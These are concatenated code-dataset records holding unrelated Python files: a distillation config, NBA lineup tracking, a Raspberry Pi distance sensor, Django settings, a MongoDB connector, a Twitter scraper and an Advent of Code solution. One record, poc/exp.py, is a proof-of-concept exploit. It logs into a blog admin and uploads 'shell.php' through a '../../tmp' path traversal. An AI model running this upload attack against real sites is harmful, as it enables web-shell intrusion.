other)\n","sub_path":"sakura/daemon/processing/streams/output/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"436425658","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom selenium import webdriver\nimport requests\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef login(host):\n firefox_opt = webdriver.FirefoxOptions()\n firefox_opt.add_argument(\"--headless\")\n #firefox_binary = FirefoxBinary('/usr/local/bin/geckodriver')\n \n #driver = webdriver.Firefox(firefox_binary=firefox_binary)\n driver = webdriver.Firefox(firefox_options=firefox_opt)\n url = host + '/admin'\n driver.get(url)\n cookie = driver.get_cookies()\n cookie_h = cookie[0]['name']\n cookie_b = cookie[0]['value'] \n driver.find_element_by_id(\"jsusername\").clear()\n driver.find_element_by_id(\"jsusername\").send_keys(\"cuc\")\n driver.find_element_by_id(\"jspassword\").clear()\n driver.find_element_by_id(\"jspassword\").send_keys(\"111111\")\n driver.find_element_by_xpath(\n '//div[@class=\"form-group mt-4\"]/button[@class=\"btn btn-primary btn-lg mr-2 w-100\"]').click() # µã»÷µÇ¼°´Å¥\n driver.find_element_by_xpath('/html/body/div[3]/div/div[1]/ul/li[4]/a').click() # µã»÷׫дÎÄÕÂ\n csrftoken = driver.find_element_by_xpath('//*[@id=\"jstokenCSRF\"]')\n ctoken = csrftoken.get_attribute('value')\n user_agent = driver.execute_script(\"return navigator.userAgent;\")\n return ctoken, cookie_b,user_agent\n\ndef exp(host, token, cookie_b,user_agent):\n cookies = {\n 'BLUDIT-KEY': cookie_b\n }\n headers = {\n 'User-Agent':user_agent ,\n 'Content-Type': 'multipart/form-data; boundary=--------327107347321150223463725464476',\n 'Origin': host,\n 'Referer': host + '/admin/new-content',\n }\n data = '----------327107347321150223463725464476\\n' \\\n + 'Content-Disposition: form-data; name=\"images[]\"; filename=\"shell.php\"\\n' \\\n + 'Content-Type: image/jpeg\\n' \\\n + '\\n' \\\n + 'hello \\n' \\\n + '----------327107347321150223463725464476\\n' \\\n + 'Content-Disposition: form-data; name=\"uuid\"\\n' \\\n + '\\n' \\\n + '../../tmp' \\\n + '\\n' \\\n + '----------327107347321150223463725464476\\n' \\\n + 'Content-Disposition: form-data; name=\"tokenCSRF\"\\n' \\\n + '\\n' \\\n + '{csrftokrn}\\n'.format(csrftokrn=token) \\\n + '----------327107347321150223463725464476--\\n'\n\n response = requests.get(host + '/bl-content/tmp/shell.php', headers=headers, data=data, cookies=cookies)\n if \"hello\" in response.text:\n print(\"Poc Success!\")\n else:\n print(\"Poc failed!\") \n \n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Usage: exp.py blog_host')\n exit(0)\n h = sys.argv[1]\n tup = login(h)\n token = tup[0]\n cookie_b = tup[1]\n user_agent = tup[2]\n exp(h, token, cookie_b,user_agent)\n","sub_path":"poc/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598075404","text":"_base_ = ['mmcls::mobilenet_v2/mobilenet-v2_8xb32_in1k.py']\n\nstudent = _base_.model\n\nteacher_ckpt = 'https://download.openmmlab.com/mmclassification/v0/resnet/resnet50_8xb32_in1k_20210831-ea4938fc.pth' # noqa: E501\n\nmodel = dict(\n _scope_='mmrazor',\n _delete_=True,\n type='SingleTeacherDistill',\n data_preprocessor=dict(\n type='ImgDataPreprocessor',\n # RGB format normalization parameters\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n # convert image from BGR to RGB\n bgr_to_rgb=True),\n architecture=student,\n teacher=dict(\n cfg_path='mmcls::resnet/resnet50_8xb32_in1k.py', pretrained=False),\n teacher_ckpt=teacher_ckpt,\n distiller=dict(\n type='ConfigurableDistiller',\n student_recorders=dict(\n fc=dict(type='ModuleOutputs', source='head.fc')),\n teacher_recorders=dict(\n fc=dict(type='ModuleOutputs', source='head.fc')),\n distill_losses=dict(\n loss_kl=dict(type='KLDivergence', tau=1, loss_weight=3)),\n loss_forward_mappings=dict(\n loss_kl=dict(\n preds_S=dict(from_student=True, recorder='fc'),\n preds_T=dict(from_student=False, recorder='fc')))))\n\nfind_unused_parameters = True\n\nval_cfg = dict(_delete_=True, type='mmrazor.SingleTeacherDistillValLoop')\n","sub_path":"cv/distiller/CWD/pytorch/mmrazor/configs/distill/mmcls/kd/kd_logits_resnet50_mobilenet-v2_8xb32_in1k.py","file_name":"kd_logits_resnet50_mobilenet-v2_8xb32_in1k.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66147475","text":"\"\"\"\n\nWhich players are on the court?\n\n\"\"\"\nimport sys\nimport pandas as pd\nimport numpy as np\nfrom sqlalchemy import create_engine\nimport credentials\nimport warnings\n\ndef get_starting_lineup(quarter_df, quarter_players_df):\n\t\"\"\"\n\tReturns dataframe of the 10 players on the court for start of every quarter in play by play data\n\t\n\t:param quarter_df: general play by play NBA data subset to one quarter of one event_id\n\t:type quarter_df: pandas dataframe\n\n\t:param quarter_players_df: play by play data with player information subset to game and quarter\n\t:type quarter_players_df: pandas dataframe\n\n\t\"\"\"\t\n\tstarters_df = pd.DataFrame(columns = ['event_id','play_id', 'player_id'])\n\tif quarter_df['period'].iloc[0] == 1:\n\t\tstarters_df = quarter_players_df.loc[quarter_players_df['play_event_id']==0][['event_id', 'play_id', 'player_id']].astype(int)\n\telse: \n\t\t#get all players who played at all during the quarter\n\t\tall_players = quarter_players_df['player_id'].dropna().unique().tolist()\n\t\tstarters=[]\n\t\tnon_starters=[]\n\t\t#get all of the subs made in the quarter\n\t\tall_subs_df = quarter_players_df.loc[quarter_players_df['play_event_id']==10][['event_id','player_id','play_id','sequence']]\t\n\t\tall_subs_dict = all_subs_df.to_dict('records')\n\t\t#from the first sub in the quarter, depending on which player was subbed in vs out, we can figure out who started\n\t\tfor play in all_subs_dict:\n\t\t\t#this is in the case the same player is subbed in/out twice before one of the other starters\n\t\t\t#import pdb; pdb.set_trace()\n\t\t\tif play['player_id'] not in starters and play['player_id'] not in non_starters:\n\t\t\t\tall_players = [player for player in all_players if player != play['player_id']]\n\t\t\t\tif play['sequence'] == 1:\n\t\t\t\t\tnon_starters.append(play['player_id'])\n\t\t\t\telif play['sequence'] == 2:\n\t\t\t\t\tstarters.append(play['player_id'])\n\t\t\t#if len(starters) == 10:\n\t\t\t\t#break\n\t\tif len(starters) != 10:\n\t\t\t#this next line is for players that played an entire quarter without being subbed. Steph sometimes does this\n\t\t\tstarters.extend(all_players)\n\t\t\tif len(starters) > 10:\n\t\t\t\twarning_message = \"WARNING: STARTING LINEUP IS GREATER THAN 10 FOR GAME: \"+ str(play['event_id']) + \" QUARTER: \" + str(quarter_df['period'].iloc[0]) + \". Best guess starters applied.\"\n\t\t\t\twarnings.warn(warning_message)\n\t\t\t\tstarters = best_guess_starters(quarter_players_df, all_players, starters, non_starters)\n\t\t\telif len(starters) < 10:\n\t\t\t\twarning_message = \"WARNING: STARTING LINEUP IS LESS THAN 10 FOR GAME: \"+ str(play['event_id']) + \" QUARTER: \" + str(quarter_df['period'].iloc[0]) \n\t\t\t\twarnings.warn(warning_message)\n\t\tstarting_info = quarter_df.loc[quarter_df['play_event_id']==14]\n\n\t\tfor starter in starters:\n\t\t\tnew_starter = {'event_id':int(starting_info['event_id']), 'play_id':int(starting_info['play_id']), 'player_id':starter}\n\t\t\tstarters_df = starters_df.append(new_starter, ignore_index=True)\n\tstarters_df=starters_df.astype(int)\n\treturn(starters_df)\n\ndef get_active_players(quarter_df, quarter_players_df, starters_df):\n\t\"\"\"\n\tReturns dataframe of the 10 players on the court for every play in play by play data\n\t\n\t:param quarter_df: general play by play NBA data subset to one quarter of one event_id\n\t:type quarter_df: pandas dataframe\n\n\t:param quarter_players_df: play by play data with player information subset to game and quarter\n\t:type quarter_players_df: pandas dataframe\n\n\t:param starters_df: dataframe containing players that started the quarter on the court\n\t:type starters_df: pandas dataframe \t\n\n\t\"\"\"\t\n\tpoc_df = pd.DataFrame(columns = ['event_id','play_id', 'player_id'])\n\tcurrent_players=starters_df\n\tpoc_df = poc_df = pd.concat([poc_df, current_players], ignore_index=True)\n\tif quarter_df['period'].iloc[0] == 1:\n\t\tafter_starters = quarter_df.loc[quarter_df['play_event_id']!=0]\n\telse:\n\t\tafter_starters = quarter_df.loc[(quarter_df['play_event_id']!=0) & (quarter_df['play_event_id']!=14)]\n\tafter_starters = after_starters[['event_id','play_id','play_event_id']]\n\tq_dict = after_starters.to_dict('records')\n\tfor play in q_dict:\n\t\tif play['play_event_id'] != 10:\n\t\t\t#if it's not a substitution, the current players list doens't change, so just update play_id\n\t\t\tcurrent_players['play_id'] = play['play_id']\n\t\telif play['play_event_id'] == 10:\n\t\t\t#if it is a substituion, we grab that play from the pbp_players_df and use sequence to find out who is in and who is out\n\t\t\tsub_df = quarter_players_df.loc[(quarter_players_df['event_id']==play['event_id']) & (quarter_players_df['play_id']==play['play_id'])]\n\t\t\tnew_player_id = int(sub_df.loc[sub_df['sequence']==1]['player_id'].iloc[0])\n\t\t\tnew_player = {'event_id':play['event_id'], 'play_id':play['play_id'], 'player_id':new_player_id}\n\t\t\tcurrent_players = current_players.append(new_player, ignore_index=True)\t\n\t\t\t#remove player from active_players\n\t\t\tremove_player_id = int(sub_df[sub_df['sequence']==2]['player_id'].iloc[0])\n\t\t\tcurrent_players = current_players[current_players.player_id != remove_player_id]\n\t\t\tcurrent_players['play_id'] = play['play_id']\n\t\tpoc_df = pd.concat([poc_df, current_players], ignore_index=True)\n\treturn(poc_df)\t\n\ndef best_guess_starters(quarter_players_df, all_players, starters, non_starters):\n\t\"\"\"\n\tThis function was made necessary by T.J Warren! In the 4th quarter of the game vs the Rockets on 2017/11/16,\n\tMr. Warren, while residing on the bench since the 3rd quarter, got a technical foul. Mr. Warren remained on the bench for \n\tthe rest of the game. T.J Warren appeared on the play-by-play log without playing a single minute in the quarter. In \n\tother words, T.J Warren is a true playmaker wherever he is in the gym\n\t\n\tMakes best guess on whichc unaccounted for player should be considered a starter\n\n\t:param quarter_players_df: play by play data with player information subset to game and quarter\n\t:type quarter_players_df: pandas dataframe\n\n\t:param all_players: list of all players who logged a play in the quarter\n\t:type all_players: list \n\n\t:param starters: list of players we have identified as starters\n\t:type starters_df: list\n\n\t:param non_starters: list of players we have identified as non-starters\n\t:type non_starters: list\n\n\t\"\"\"\n\t#all players not accounted for through subs\n\tnot_accounted_for = np.setdiff1d(all_players,non_starters)\n\t#get how many plays they were involved in\n\tplay_count = quarter_players_df['player_id'].value_counts()\n\tplay_count_dict = play_count.to_dict()\n\tplay_count_dict = {player:play_count[player] for player in not_accounted_for}\n\t#of the players who showed up in the quarter that weren't subbed in or out, this guy has the least amount of plays and should be the candidate removed from best guess starting lineup\n\tremove_candidate = min(play_count_dict, key=play_count.get)\n\tbest_guess_starters = [player for player in starters if player != remove_candidate]\n\treturn(best_guess_starters)\n\n\ndef main():\n\n\n\tconn = \"mysql+pymysql://{0}:{1}@{2}/{3}\".format(credentials.dbuser, credentials.dbpass, credentials.dbhost, credentials.dbname)\n\n\tengine = create_engine(\"mysql+pymysql://{user}:{pw}@localhost/{db}\"\n .format(user=credentials.dbuser,\n pw=credentials.dbpass,\n db=credentials.dbname))\t\t\n\n\t#Due to starting lineups only being available for quarter 1, I will be treating Q1 differently than the rest\n\t#read in data\n\tfolder_path = sys.argv[1]\n\tpbp_file = sys.argv[2] \n\tpbp_players_file = sys.argv[3]\n\t#read in .xlsx files with pandas\n\tpbp_df = pd.read_excel(folder_path+pbp_file, header=0)\n\tpbp_players_df = pd.read_excel(folder_path+pbp_players_file, header=0)\n\n\tpbp_df.sort_values(by = ['event_id','play_id'], inplace = True)\n\tpbp_players_df.sort_values(by = ['event_id','play_id'], inplace = True)\n\t#make empty df to append to\n\ton_court_df = pd.DataFrame(columns = ['event_id','play_id', 'player_id'])\n\t#dealing with one game at a time\n\tgames=pbp_df.groupby('event_id')\n\tfor game in games.groups:\n\t\t\n\t\tthis_game=games.get_group(game)\n\t\t#deal with quarters individually\n\t\tquarters = this_game.groupby('period')\n\t\tfor quarter in quarters.groups:\n\t\t\t\n\t\t\tquarter_df = quarters.get_group(quarter)\n\t\t\t#making subset of pbp_players_df\n\t\t\tquarter_players_df = pbp_players_df.loc[(pbp_players_df['event_id']==game) & (pbp_players_df['period']==quarter)]\n\t\t\tstarters_df = get_starting_lineup(quarter_df, quarter_players_df)\n\t\t\tactive_players = get_active_players(quarter_df, quarter_players_df, starters_df)\n\t\t\ton_court_df = pd.concat([on_court_df, active_players], ignore_index=True)\n\ton_court_df.to_csv('/home/bealt/coding_projects/Swish_Analytics/Swish Analytics - Data Engineer Project/Swish Analytics - Data Engineer Project/on_court.csv', index=False)\n\n\ton_court_df.to_sql('pbp_players_on_court', con = engine, if_exists = 'append', chunksize = 1000)\n\tpbp_players_on_court = pd.read_sql_table('pbp_players_on_court', engine)\n\tpbp_players_on_court = pbp_players_on_court[['event_id', 'play_id', 'player_id']]\n\tpbp_players_on_court.to_csv('/home/bealt/coding_projects/Swish_Analytics/Swish Analytics - Data Engineer Project/Swish Analytics - Data Engineer Project/on_court.csv', index=False) \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pbp.py","file_name":"pbp.py","file_ext":"py","file_size_in_byte":9126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"603336581","text":"import RPi.GPIO as GPIO #RPi.GPIO 모듈을 GPIO란 이름으로 사용\r\nimport time #time 함수 사용\r\n\r\nLED=21 #LED를 GPIO 21에 연결\r\nGPIO.setmode(GPIO.BCM) #핀 넘버링을 BCM 방식을 사용\r\nGPIO_TRIGGER=26 # HC-SR04의 트리거 핀을 GPIO 26에 연결\r\nGPIO_ECHO=19 # 에코핀을 GPIO 19에 연결\r\nprint (\"Ultrasonic Distance Measurement\") #Ultrasonic Distance Measurement 출력\r\n\r\nGPIO.setup(GPIO_TRIGGER,GPIO.OUT) #초음파를 내보낼 트리거 핀 출력 모드로 설정\r\nGPIO.setup(GPIO_ECHO,GPIO.IN) #반사파를 수신할 에코 핀 입력 모드로 설정\r\nGPIO.setup(LED,GPIO.OUT) #동작이 감지되면 켜거나 꺼지게 하는 LED를 출력 모드로 설정\r\n\r\ntry: #블록 안의 구문을 수행하라\r\n while True: #While문의 조건이 TRUE이므로 안에 기술된 구문들이 무한하게 수행\r\n stop = 0 #stop 값을 0으로 설정\r\n start = 0 #start 값을 0으로 설정\r\n GPIO.output(GPIO_TRIGGER, False) #먼저 트리거 핀을 OFF 상태로 유지\r\n time.sleep(2) #2초간 코드를 실행하지 않고 멈춤\r\n GPIO.output(GPIO_TRIGGER, True) #10us 펄스 출력\r\n time.sleep(0.00001) #0.00001초간 코드를 실행하지 않고 멈춤\r\n GPIO.output(GPIO_TRIGGER, False) #트리거 핀을 OFF 상태로 설정\r\n\r\n while GPIO.input(GPIO_ECHO)==0:# 에코 핀이 ON되는 시점을 시작 시간으로 함\r\n start = time.clock() #start에 시작 시간을 측정하여 대입함\r\n while GPIO.input(GPIO_ECHO)==1:#에코 핀이 다시 OFF되는 시점을 반사파 수신 시간으로 함\r\n stop = time.clock() #stop에 수신 시간을 측정하여 대입함\r\n duration = stop-start #Calculate pulse length \r\n if (stop and start): #stop 과 start 모두 TRUE일 경우 아래의 구문을 수행함\r\n distance = duration * 17000 # 음속은 편의상 340m/s로 계산_초음파는 반사파로 실제 이동 거리는 2배_ 떄문에 2로 나눔\r\n print(\"Distance : %.1f cm\" %distance)#위에서 계산한 distance를 출력\r\n if distance >= 10: #만약 distance가 10보다 크거나 같으면 다음의 구문을 실행함\r\n GPIO.output(LED,True) #LED의 디지털 출력을 HIGH(1)로 설정 = LED가 켜짐\r\n else: #distance가 10보다 작으면 다음의 구문을 실행함\r\n GPIO.output(LED,False) #LED의 디지털 출력을 LOW(0)로 설정 = LED가 꺼짐\r\nexcept KeyboardInterrupt: #만약 KeyboardInterrupt 오류가 발생할경우 아래의 구문을 실행함\r\n print (\"Ultrasonic Distance Measurement End\") #Ultrasonic Distance Measurement End를 출력\r\n GPIO.cleanup() #GPIO를 초기화함\r\n","sub_path":"김예진/7_2/7_2.py","file_name":"7_2.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"261153353","text":"\"\"\"\nSettings of integrated third-party authentication libraries.\n\nhttps://github.com/pennersr/django-allauth\nhttps://github.com/Tivix/django-rest-auth\nhttp://getblimp.github.io/django-rest-framework-jwt/\n\"\"\"\n\n\n# django-allauth\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_USERNAME_REQUIRED = False\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nLOGIN_REDIRECT_URL = 'http://localhost:8000'\nSITE_ID = 1\n","sub_path":"{{cookiecutter.project_name}}/{{cookiecutter.project_name}}/settings/integrations/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"347725138","text":"from Database_Objects import regression\nfrom Database_Objects.match import dotaMatch, matchAttributes\nfrom Database_Objects.team import teamAttributes\nfrom Database_Objects.league import league, leagueAttributes\nfrom Database_Objects.player import player, playerAttributes\nfrom Database_Objects.team import team, teamAttributes\n\nfrom pymongo import MongoClient\nimport os\nfrom enum import Enum\n\nclass DatabaseConnector():\n\n \n def __init__(self, mongoString):\n self.client = MongoClient(mongoString)\n self.db = self.client.Dota2ProMatches\n\n def getServerStatus(self):\n return(self.db.command(\"serverStatus\"))\n\n # obj is the data, cName is the collection to add the document to.\n # true if operation worked, otherwise false\n def insertMany(self, data, cName):\n if(cName not in databaseCollections):\n return False\n if(data is None):\n return False\n try:\n if( cName.value == \"Players\"):\n self.db.Players.insert_many(data)\n elif( cName.value == \"Matches\"):\n self.db.Matches.insert_many(data)\n elif( cName.value == \"Teams\"):\n self.db.Teams.insert_many(data)\n elif( cName.value == \"Leagues\"):\n self.db.Leagues.insert_many(data)\n elif( cName.value == \"Regressions\"):\n self.db.Regressions.insert_many(data)\n else:\n return False\n return True\n except Exception as e:\n print(e)\n return False\n\n # takes a query which is a dictionary using mongo syntax and a database Collection to look in\n def makeQuery(self, query, dbc):\n if(dbc == databaseCollections.LEAGUES):\n return self.db.Leagues.find(query)\n elif(dbc == databaseCollections.TEAMS):\n return self.db.Teams.find(query)\n elif(dbc == databaseCollections.PLAYERS):\n return self.db.Players.find(query)\n elif(dbc == databaseCollections.HEROES):\n return self.db.Heroes.find(query)\n elif(dbc == databaseCollections.MATCHES):\n return self.db.Matches.find(query)\n elif(dbc == databaseCollections.REGRESSIONS):\n return self.db.Regressions.find(query)\n\n\n def getDocumentsByAttribute(self, value, attribute):\n returnable = []\n if(attribute in leagueAttributes):\n results = self.db.Leagues.find({attribute.value: value})\n for iterable in results:\n returnable.append(league.from_dict(iterable))\n elif(attribute in playerAttributes):\n results = self.db.Players.find({attribute.value: value})\n for iterable in results:\n returnable.append(player.fromDict(iterable))\n elif(attribute in teamAttributes):\n results = self.db.Teams.find({attribute.value: value})\n for iterable in results:\n returnable.append(team.fromDict(iterable))\n elif(attribute in matchAttributes):\n results = self.db.Matches.find({attribute.value: value})\n for iterable in results:\n returnable.append(dotaMatch.fromDict(iterable))\n elif(attribute in regression.regressionAttributes):\n results = self.db.Regressions.find({attribute.value: value})\n for iterable in results:\n returnable.append(dotaMatch.fromDict(iterable))\n return returnable\n\nclass databaseCollections(Enum):\n PLAYERS = 'Players'\n MATCHES = 'Matches'\n TEAMS = 'Teams'\n LEAGUES = 'Leagues'\n HEROES = 'Heroes'\n REGRESSIONS = 'Regressions'","sub_path":"DatabaseConnector.py","file_name":"DatabaseConnector.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"455725788","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.5-i386/egg/fileinfo/plugins/fileinfo_inv_plugin_jove_pdf.py\n# Compiled at: 2008-11-14 05:28:41\n\"\"\"A fileinfo plug-in for accessing the JHOVE file validator.\n\nYou need to set the variable 'jhoveHome' to the path of the JHOVE \ninstallation directory on your system, if you want to use this \nplug-in. This is very experimental...\n\nSee also: \n\n http://hul.harvard.edu/jhove\n\"\"\"\nimport re, sys, os.path\nfrom os import popen\nfrom fileinfo.investigator import BaseInvestigator\njhoveHome = '/Applications/Added/jhove'\n\nclass JhovePdfInvestigator(BaseInvestigator):\n \"\"\"A class for validating PDF files using Jhove.\"\"\"\n __module__ = __name__\n attrMap = {'status': 'getstatus', 'errmsg': 'geterrmsg', 'errmsgext': 'geterrmsgext'}\n totals = ()\n\n def activate(self):\n \"\"\"Try activating self, setting 'active' variable.\"\"\"\n if os.path.exists(jhoveHome):\n format = '%s/jhove -c %s/conf/jhove.conf -m pdf-hul -k %s'\n cmd = format % (jhoveHome, jhoveHome, self.path)\n self.jhoveOutput = popen(cmd).read()\n self.active = True\n else:\n self.active = False\n return self.active\n\n def getstatus(self):\n \"\"\"Return Jhove status.\"\"\"\n m = re.search('^\\\\s*Status:\\\\s*(.*)$', self.jhoveOutput, re.M)\n if m:\n output = m.groups()[0]\n else:\n output = 'n/a'\n return output\n\n def geterrmsg(self):\n \"\"\"Return Jhove error message.\"\"\"\n m = re.search('^\\\\s*ErrorMessage:\\\\s*(.*)$', self.jhoveOutput, re.M)\n if m:\n output = m.groups()[0]\n else:\n output = 'n/a'\n return output\n\n def geterrmsgext(self):\n \"\"\"Return Jhove extended error message.\"\"\"\n m = re.search('^\\\\s* ErrorMessage:\\\\s*([\\\\w ]+)\\\\s+(Offset:\\\\s+\\\\d+)$', self.jhoveOutput, re.M)\n if m:\n output = '%s (%s)' % m.groups()\n else:\n m = re.search('^\\\\s*ErrorMessage:\\\\s*(.*)$', self.jhoveOutput, re.M)\n if m:\n output = m.groups()[0]\n else:\n output = 'n/a'\n return output.replace('dictionary', 'dict.')","sub_path":"pycfiles/fileinfo-0.3.3-py2.4/fileinfo_inv_plugin_jove_pdf.py","file_name":"fileinfo_inv_plugin_jove_pdf.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"651351084","text":"import tweepy\r\nimport datetime\r\nimport csv\r\nimport twconfig\r\ndef gettwitterdata(keyword,dfile,sincedate,untildate):\r\n \r\n #認証情報\r\n CK = twconfig.CONSUMER_KEY\r\n CS = twconfig.CONSUMER_SECRET\r\n AT = twconfig.ACCESS_TOKEN\r\n ATS = twconfig.ACCESS_TOKEN_SECRET\r\n auth = tweepy.OAuthHandler(CK, CS)\r\n auth.set_access_token(AT, ATS)\r\n \r\n api = tweepy.API(auth)\r\n \r\n #検索キーワード設定 \r\n q = keyword\r\n \r\n #つぶやきを格納するリスト\r\n tweets_data =[]\r\n \r\n #カーソルを使用してデータ取得\r\n for tweet in tweepy.Cursor(api.search, \r\n q=q, \r\n count=100,\r\n tweet_mode='extended',\r\n lang='ja',\r\n since=sincedate+'_00:00:00_JST', \r\n until=untildate+'_23:59:59_JST'\r\n ).items():\r\n \r\n #つぶやきテキスト(FULL)を取得\r\n tweets_data.append([tweet.user.screen_name,\r\n tweet.created_at + datetime.timedelta(hours=9),\r\n tweet.full_text.replace('\\n',''),\r\n tweet.favorite_count,\r\n tweet.retweet_count])\r\n \r\n #print(sincedate+'_00:00:00_JST')\r\n #print(untildate+'_00:00:00_JST')\r\n \r\n #出力ファイル名\r\n fname = r\"'\"+ dfile + \"'\"\r\n fname = fname.replace(\"'\",\"\")\r\n \r\n #ファイル出力\r\n with open(fname, \"w\",newline='',encoding=\"utf-8\") as f:\r\n writer = csv.writer(f, lineterminator='\\n')\r\n writer.writerow([\"id\",\"created_at\",\"text\",\"fav\",\"RT\"])\r\n writer.writerows(tweets_data)\r\n f.close\r\n\r\nif __name__ == '__main__':\r\n\r\n #検索キーワードを入力 ※リツイートを除外する場合 「キーワード -RT 」と入力\r\n print ('====== Enter Serch KeyWord =====')\r\n keyword = input('> ')\r\n\r\n #出力ファイル名を入力(相対パス or 絶対パス)\r\n print ('====== Enter Tweet Data file =====')\r\n dfile = input('> ')\r\n\r\n #検索する期間(自)\r\n print ('====== 検索する期間(自)「yyyy-mm-dd」 =====')\r\n sincedate = input('> ')\r\n\r\n #検索する期間(至)\r\n print ('====== 検索する期間(至)「yyyy-mm-dd」 =====')\r\n untildate = input('> ')\r\n\r\n gettwitterdata(keyword,dfile,sincedate,untildate)","sub_path":"correct_data/searchtw.py","file_name":"searchtw.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"376186574","text":"#!/usr/bin/env python\n\"\"\"\n--- Day 10: Monitoring Station ---\nhttps://adventofcode.com/2019/day/10\n\nRank: 1335 / 1136\n\"\"\"\nimport functools\nimport math\nfrom typing import Dict, Generator, Set, Tuple\n\nfrom aocutils import Point, read_input, timer\n\nINPUT = [list(line) for line in read_input('10')]\nASTEROIDS = {\n Point(x_coord, y_coord) for y_coord, line in enumerate(INPUT) for x_coord, val in enumerate(line) if val == '#'\n}\n\n\ndef normalize_vector_int(point_a: Point, point_b: Point) -> Point:\n \"\"\"Get the vector from point_a to point_b normalized to the lowest int possible (gcd).\"\"\"\n vector_x = int(point_b.x - point_a.x)\n vector_y = int(point_b.y - point_a.y)\n gcd = math.gcd(vector_x, vector_y)\n return Point(vector_x // gcd, vector_y // gcd)\n\n\ndef get_detected_asteroids(asteroids: Set[Point], origin: Point) -> Set[Point]:\n \"\"\"Get the detected asteroids from a given position.\"\"\"\n vector_asteroids: Dict[Point, Set[Tuple[Point, float]]] = dict()\n for asteroid in asteroids:\n if asteroid == origin:\n continue\n vector = normalize_vector_int(origin, asteroid)\n if vector not in vector_asteroids:\n vector_asteroids[vector] = set()\n vector_asteroids[vector].add((asteroid, origin.distance(asteroid)))\n return {min(possible_asts, key=lambda k: k[1])[0] for possible_asts in vector_asteroids.values()}\n\n\n@functools.lru_cache(maxsize=1)\ndef best_location() -> Tuple[Point, int]:\n \"\"\"Get the coordinates of the best position for the monitoring station.\"\"\"\n detected_per_asteroid = {asteroid: len(get_detected_asteroids(ASTEROIDS, asteroid)) for asteroid in ASTEROIDS}\n best_pos = max(detected_per_asteroid, key=detected_per_asteroid.get)\n return best_pos, detected_per_asteroid[best_pos]\n\n\ndef order_asteroids(origin: Point, asteroids: Set[Point]) -> Generator:\n \"\"\"Get the detected asteroids ordered given an origin.\"\"\"\n vector_asteroids = list()\n for asteroid in asteroids:\n vector = normalize_vector_int(origin, asteroid)\n declive = -math.inf if vector.x == 0 else vector.y / vector.x\n vector_asteroids.append((vector, asteroid, declive))\n vector_asteroids.sort(key=lambda k: k[2])\n for vector, ast, _ in vector_asteroids:\n if vector.x >= 0 and vector.y < 0:\n yield ast\n for vector, ast, _ in vector_asteroids:\n if vector.x > 0 and vector.y >= 0:\n yield ast\n for vector, ast, _ in vector_asteroids:\n if vector.x <= 0 and vector.y > 0:\n yield ast\n for vector, ast, _ in vector_asteroids:\n if vector.x < 0 and vector.y <= 0:\n yield ast\n\n\n@timer\ndef part1():\n \"\"\"Solve challenge part 1.\"\"\"\n return best_location()[1]\n\n\n@timer\ndef part2():\n \"\"\"Solve challenge part 2.\"\"\"\n destroy_goal = 200\n m_station = best_location()[0]\n existing_asteroids = set(ASTEROIDS)\n detected_asteroids = get_detected_asteroids(existing_asteroids, m_station)\n destroyed = 0\n while detected_asteroids:\n for ast in order_asteroids(m_station, detected_asteroids):\n destroyed += 1\n if destroyed == destroy_goal:\n return ast.x * 100 + ast.y\n existing_asteroids.remove(ast)\n detected_asteroids = get_detected_asteroids(existing_asteroids, m_station)\n raise Exception(f\"Not enough asteroids destroyed. ({destroyed}/{destroy_goal})\")\n\n\nif __name__ == \"__main__\":\n print(part1())\n print(part2())\n","sub_path":"aoc10.py","file_name":"aoc10.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"144388602","text":"\"\"\"\nRicky Cheah\n6/13/2020\n\nCSC 255 - Lab 1\n\"\"\" \ndef main():\n # This tests in1.txt until in7.txt\n for i in range(1,8):\n print(SumOfK(f'in{i}.txt',f'out{i}.txt'))\n print(\"_\"*55)\n\ndef SumOfK(inFileName, outFileName):\n '''\n 1. This function accepts a file \"inFileName\".\n 2. Filters out non-digit characters, and inserts the numbers into a list.\n 3. First number in the list is popped out to be a \"target\"\n 5. The remaining list is sorted in ascending order using heapSort() at O(nlog(n))\n 4. The sorted list is searched in an O(n) fashion using two pointers, to find if \n any two numbers or the double of a single number sum up to the \"target\".\n 5. The results are written into a new file 